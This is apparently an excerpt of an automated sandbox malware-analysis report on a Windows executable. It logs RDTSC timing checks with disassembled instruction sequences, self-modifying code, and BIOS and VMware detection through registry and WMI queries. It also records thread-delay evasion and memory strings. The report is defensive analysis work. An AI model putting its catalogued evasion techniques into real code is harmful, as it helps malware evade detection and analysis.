                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 481097A second address: 4810981 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810981 second address: 48109B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, esi 0x00000009 pushad 0x0000000a mov eax, 747C4E71h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007FC69CB9B4ACh 0x00000017 xor ecx, 0329F348h 0x0000001d jmp 00007FC69CB9B4ABh 0x00000022 popfd 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48109B1 second address: 48001C9 instructions: 0x00000000 rdtsc 0x00000002 mov dl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007FC69CE9FC5Bh 0x0000000d leave 0x0000000e jmp 00007FC69CE9FC66h 0x00000013 retn 0004h 0x00000016 nop 0x00000017 cmp eax, 00000000h 0x0000001a setne al 0x0000001d jmp 00007FC69CE9FC52h 0x0000001f xor ebx, ebx 0x00000021 test al, 01h 0x00000023 jne 00007FC69CE9FC57h 0x00000025 sub esp, 04h 0x00000028 mov dword ptr [esp], 0000000Dh 0x0000002f call 00007FC6A12BD3F9h 0x00000034 mov edi, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FC69CE9FC67h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48001C9 second address: 48001ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48001ED second address: 4800213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dh, al 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dh, ah 0x0000000c push edx 0x0000000d mov bx, si 0x00000010 pop esi 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 pushad 0x00000015 push edi 0x00000016 pop esi 0x00000017 push ebx 0x00000018 pop eax 0x00000019 popad 0x0000001a movsx edx, ax 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800213 second address: 4800219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800219 second address: 4800255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b jmp 00007FC69CE9FC69h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov esi, 23D55843h 0x00000017 push ecx 0x00000018 mov di, D54Ah 0x0000001c pop ebx 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ecx, 20D57169h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800255 second address: 480025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 480025B second address: 4800296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FC69CE9FC60h 0x00000011 xchg eax, edi 0x00000012 jmp 00007FC69CE9FC60h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800296 second address: 480029A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 480029A second address: 48002A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48002A0 second address: 48002B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4B2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48002EF second address: 480036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b pushad 0x0000000c jmp 00007FC69CE9FC65h 0x00000011 mov dx, cx 0x00000014 popad 0x00000015 inc ebx 0x00000016 pushad 0x00000017 call 00007FC69CE9FC5Fh 0x0000001c mov bh, ch 0x0000001e pop edi 0x0000001f popad 0x00000020 test al, al 0x00000022 jmp 00007FC69CE9FC60h 0x00000027 je 00007FC69CE9FDD5h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FC69CE9FC67h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 480036C second address: 48003B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 push esi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea ecx, dword ptr [ebp-14h] 0x0000000d jmp 00007FC69CB9B4AAh 0x00000012 mov dword ptr [ebp-14h], edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FC69CB9B4ADh 0x0000001d pushfd 0x0000001e jmp 00007FC69CB9B4B0h 0x00000023 adc ah, FFFFFF98h 0x00000026 jmp 00007FC69CB9B4ABh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48003E7 second address: 48003F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48003F6 second address: 4800400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov cx, dx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 480052E second address: 4800532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800532 second address: 4800536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800536 second address: 480053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 480053C second address: 4800558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4B8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800558 second address: 4800579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov edi, esi 0x0000000c popad 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC69CE9FC61h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800579 second address: 48005B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC69CB9B4B1h 0x0000000f nop 0x00000010 jmp 00007FC69CB9B4AEh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48005B6 second address: 48005BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48005BA second address: 48005D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48005D7 second address: 4800644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69CE9FC67h 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC69CE9FC5Bh 0x00000016 sub ah, FFFFFFFEh 0x00000019 jmp 00007FC69CE9FC69h 0x0000001e popfd 0x0000001f mov ecx, 0694CF47h 0x00000024 popad 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC69CE9FC69h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800644 second address: 4800649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48006B8 second address: 4800031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FC69CE9FC5Eh 0x00000010 je 00007FC70F72DBCEh 0x00000016 xor eax, eax 0x00000018 jmp 00007FC69CE7938Ah 0x0000001d pop esi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 leave 0x00000021 retn 0004h 0x00000024 nop 0x00000025 xor ebx, ebx 0x00000027 cmp eax, 00000000h 0x0000002a je 00007FC69CE9FDB3h 0x00000030 call 00007FC6A12BD0DDh 0x00000035 mov edi, edi 0x00000037 jmp 00007FC69CE9FC67h 0x0000003c xchg eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FC69CE9FC65h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800031 second address: 4800049 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov ecx, 6510FB5Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop ebx 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800049 second address: 4800058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC5Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800058 second address: 480005C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 480005C second address: 480006B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 480006B second address: 4800079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800079 second address: 4800150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC69CE9FC64h 0x00000012 add si, A888h 0x00000017 jmp 00007FC69CE9FC5Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC69CE9FC68h 0x00000023 sub esi, 382B0AE8h 0x00000029 jmp 00007FC69CE9FC5Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 jmp 00007FC69CE9FC66h 0x00000036 push eax 0x00000037 jmp 00007FC69CE9FC5Bh 0x0000003c xchg eax, ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FC69CE9FC5Bh 0x00000046 xor cx, 6F8Eh 0x0000004b jmp 00007FC69CE9FC69h 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007FC69CE9FC60h 0x00000057 or al, 00000008h 0x0000005a jmp 00007FC69CE9FC5Bh 0x0000005f popfd 0x00000060 popad 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800150 second address: 4800156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800156 second address: 480015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800B0F second address: 4800B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800B15 second address: 4800B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800B19 second address: 4800B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800B80 second address: 4800B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800B86 second address: 4800BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 1636FD7Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC69CB9B4B3h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800BA8 second address: 4800BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 613B6156h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC69CE9FC5Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800BDB second address: 4800BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800C49 second address: 4800C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800C4F second address: 4800C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800C53 second address: 4800C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a jmp 00007FC69CE9FC66h 0x0000000f je 00007FC70F713968h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push edi 0x00000019 pop eax 0x0000001a movsx edi, cx 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800C82 second address: 4800C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800C88 second address: 4800CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp+08h], 00002000h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007FC69CE9FC63h 0x0000001a pop ecx 0x0000001b push edi 0x0000001c pop ecx 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4800CBC second address: 4800CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 48109F9 second address: 4810A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC64h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810A11 second address: 4810A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810A21 second address: 4810A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810A26 second address: 4810A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810A2C second address: 4810A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810A30 second address: 4810A41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810A41 second address: 4810A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810A45 second address: 4810A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810A4B second address: 4810AA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC69CE9FC5Dh 0x00000012 sub esi, 252D6DE6h 0x00000018 jmp 00007FC69CE9FC61h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 jmp 00007FC69CE9FC5Eh 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC69CE9FC5Eh 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810AA5 second address: 4810B12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bh, al 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC69CB9B4B7h 0x00000014 add si, F32Eh 0x00000019 jmp 00007FC69CB9B4B9h 0x0000001e popfd 0x0000001f mov edi, ecx 0x00000021 popad 0x00000022 popad 0x00000023 mov esi, dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC69CB9B4B9h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810B12 second address: 4810B6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d jmp 00007FC69CE9FC62h 0x00000012 je 00007FC70F70D4DCh 0x00000018 pushad 0x00000019 jmp 00007FC69CE9FC5Eh 0x0000001e mov edx, eax 0x00000020 popad 0x00000021 cmp dword ptr [770E459Ch], 05h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC69CE9FC66h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810B6A second address: 4810B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810B6E second address: 4810B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810B74 second address: 4810BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC69CB9B4B3h 0x00000009 adc ah, 0000000Eh 0x0000000c jmp 00007FC69CB9B4B9h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 je 00007FC70F420D92h 0x0000001b jmp 00007FC69CB9B4AEh 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov si, bx 0x00000027 movsx ebx, si 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810BCA second address: 4810BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC5Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810BDC second address: 4810BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810C3E second address: 4810C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC5Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810C4E second address: 4810C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4810C66 second address: 4810C6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSpecial instruction interceptor: First address: 5B3099 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSpecial instruction interceptor: First address: 5B1744 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSpecial instruction interceptor: First address: 5DEB5C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSpecial instruction interceptor: First address: 5BBA4A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe TID: 6160Thread sleep time: -270000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeLast function: Thread delayed
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
